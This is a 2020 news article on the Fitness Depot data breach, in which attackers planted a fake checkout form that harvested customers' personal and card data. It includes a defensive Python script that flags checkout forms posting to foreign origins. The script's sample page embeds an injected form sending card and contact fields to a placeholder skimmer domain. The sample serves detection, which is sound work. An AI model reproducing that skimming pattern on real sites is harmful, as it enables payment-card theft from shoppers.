Cybercriminals Used a Fake Form to Steal Fitness Depot Customers' Information

Fitness Depot Data Breach

The COVID-19 pandemic means that many people have a lot of free time and one fewer excuse for not working out. The gyms are closed, but there are plenty of online shops that sell fitness equipment and enable people to stay in shape during the lockdown. A cybercriminal gang spotted this and had no problems picking its next target.

Fitness Depot is a large Canadian sports equipment retailer that's been in the business for over 20 years, according to its website. It has dozens of brick-and-mortar outlets throughout Canada, but understandably, over the last few months, the focus has been on the ecommerce side of the business. Unfortunately, people who decided to buy fitness equipment from Fitness Depot's online store between February and May could have had their personal data stolen.

Fitness Depot reports a security incident

Nothing on Fitness Depot's website or official social media channels could lead you to believe that the retailer was targeted by hackers. Some of its customers, however, recently started receiving data breach notifications in their inbox, which suggests that the attack on Fitness Depot was actually pretty serious.

Apparently, cybercriminals first compromised Fitness Depot's ecommerce platform on February 18. They uploaded a "misleading" checkout form, redirected users to it, and harvested all the information entered on it, including names, email and physical addresses, telephone numbers, and credit card details.

Initially, the fake page affected only home delivery customers, but on April 28, the crooks updated the form, and it started targeting users who had opted for the in-store pick-up option as well. When they finally learned about the breach on May 22, Fitness Depot's IT specialists temporarily closed the online shop and took remedial action. They now "believe" that the cybercriminals' access has been cut.
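One routine check that would have surfaced a substituted checkout form like the one described above is to audit the shop's own checkout page for forms that collect payment or contact fields but submit to a foreign origin. This is an added example, not code from Fitness Depot or its notification; the page markup, the shop hostname and the skimmer domain are all constructed placeholders.

```python
# Added example for this article (not code from Fitness Depot or its notifier):
# audit a checkout page for forms that collect payment/contact data but submit
# to an origin other than the shop's own. Markup and domains are constructed.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Substrings of input names that indicate payment or contact data.
SENSITIVE = ("card", "cvv", "cvc", "expir", "email", "phone", "address")

class FormCollector(HTMLParser):
    """Record each <form>'s action and the names of the inputs inside it."""
    def __init__(self):
        super().__init__()
        self.forms, self._current = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            self._current["fields"].append((a.get("name") or "").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def audit_forms(html, page_url):
    """Return [(resolved action URL, sensitive field names)] for every form
    that gathers sensitive data yet posts to an origin other than page_url's."""
    parser = FormCollector()
    parser.feed(html)
    own = urlsplit(page_url)
    findings = []
    for form in parser.forms:
        target = urlsplit(urljoin(page_url, form["action"]))  # relative -> absolute
        hits = [f for f in form["fields"] if any(k in f for k in SENSITIVE)]
        if hits and (target.scheme, target.netloc) != (own.scheme, own.netloc):
            findings.append((target.geturl(), hits))
    return findings

# Constructed page: the shop's own checkout form plus an injected one that
# posts card data to a placeholder skimmer domain.
SAMPLE_PAGE = """<form action="/checkout/submit" method="post">
<input name="email"><input name="card_number"><input name="cvv"></form>
<form action="https://skimmer.example/collect" method="post">
<input name="full_name"><input name="phone"><input name="card_number"></form>"""

if __name__ == "__main__":
    for url, fields in audit_forms(SAMPLE_PAGE, "https://shop.example/checkout"):
        print("offsite form ->", url, fields)
```

This only catches forms whose action points offsite; a skimmer that reads fields from the legitimate form and sends them elsewhere via script needs a separate control such as a Content Security Policy with a restrictive form-action and connect-src, plus integrity monitoring of the checkout page's scripts.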

Was it Magecart?

The attack bears all the characteristics of a classic Magecart operation, but it's impossible to say with absolute certainty what it was because quite a few pieces of the puzzle are missing. On the whole, Fitness Depot's data breach notification is pretty uninformative.

We don't know, for example, how many people could have been affected by the breach. We also have no idea why it took the retailer three full months to learn that someone had compromised its website, and we can't be sure if it plans to help victims by offering to pay for identity theft protection services.

Fitness Depot seems to know who's to blame for the whole thing, though. An investigation apparently revealed that the retailer's ISP had "neglected to activate the anti-virus software" on its account. The notification doesn't say what sort of anti-virus software is supposed to protect the online shop, and there's no information on why a retailer selling hundreds of items to hundreds of thousands of users had to suffer a data breach in order to find out that its website was not secure.

June 9, 2020
